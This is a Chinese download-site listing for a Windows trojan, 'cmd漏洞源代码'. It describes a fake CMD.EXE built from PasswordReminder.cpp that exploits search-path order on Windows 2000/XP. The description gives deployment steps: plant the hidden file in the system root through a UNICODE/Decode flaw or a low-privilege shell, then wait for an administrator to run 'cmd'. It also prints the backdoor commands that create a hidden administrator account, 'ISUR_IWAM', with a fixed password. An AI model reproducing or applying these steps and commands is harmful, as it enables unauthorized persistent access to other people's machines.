文件名称:cmd漏洞源代码
- 所属分类:
- 其他小程序
- 资源属性:
- [Windows] [Visual C] [源码]
- 上传时间:
- 2012-11-26
- 文件大小:
- 18kb
- 下载次数:
- 0次
- 提 供 者:
- 姜*
- 相关连接:
- 无
- 下载说明:
- 别用迅雷下载,失败请重下,重下不扣分!
介绍说明--下载内容均来自于网络,请自行研究使用
你是不是经常在开始菜单的运行窗口里运行命令呢? 看看这个漏洞: http://zdnet.com /2100-1105-964057.html win2000和xp在执行搜索的时候, 首先查找根目录 而开始菜单的运行窗口里执行命令, 也是首先在系统盘的根目录里进行查找. 这个漏洞其实是已经是公开的秘密了. 既然现在作为漏洞公布出来, 我也就把网上的PasswordReminder.cpp拿来改了改 加了一个加超级管理员用户和执行cmd.exe的功能. 使用方法: 把程序解压, 把压缩包里的文件 CMD.EXE (该文件具有隐藏和只读属性) 释放到目标机器的系统盘根目录, 一般都是在C:比如利用UNICODE/Decode漏洞就有写根目录的权限, 同时Asp/fp30reg.dll等远程溢出出来的Shell, 一般都只有匿名权限, 但是它具有写根目录的权限 这个时候, 就可以把本程序放到目标机器的系统盘根目录 只要等管理员在机器的开始菜单里运行命令: cmd 一切尽在掌握中.:) PS: 系统执行后, 会先产生一个线程来做一些处理 然后用system()函数调用cmd.exe来让用户能够执行命令. 产生出来的线程会产生两个进程序执行如下两个命令: net user ISUR_IWAM wwwcnhonkercom /add net localgroup administrators ISUR_IWAM /add 这样就在系统上增加了一个超级-cmd loopholes in the source code
(系统自动生成,下载前可以参看下载内容)
下载文件列表
41
..\cmd
..\...\cmd.cpp
..\...\cmd.dsp
..\...\cmd.dsw
..\...\cmd.ncb
..\...\cmd.opt
..\...\cmd.plg
..\...\ReadMe.txt
..\...\StdAfx.cpp
..\...\StdAfx.h
..\hacker.txt
..\Readme.txt
..\ReadmeNow.txt
..\黑色海岸线.htm
..\cmd
..\...\cmd.cpp
..\...\cmd.dsp
..\...\cmd.dsw
..\...\cmd.ncb
..\...\cmd.opt
..\...\cmd.plg
..\...\ReadMe.txt
..\...\StdAfx.cpp
..\...\StdAfx.h
..\hacker.txt
..\Readme.txt
..\ReadmeNow.txt
..\黑色海岸线.htm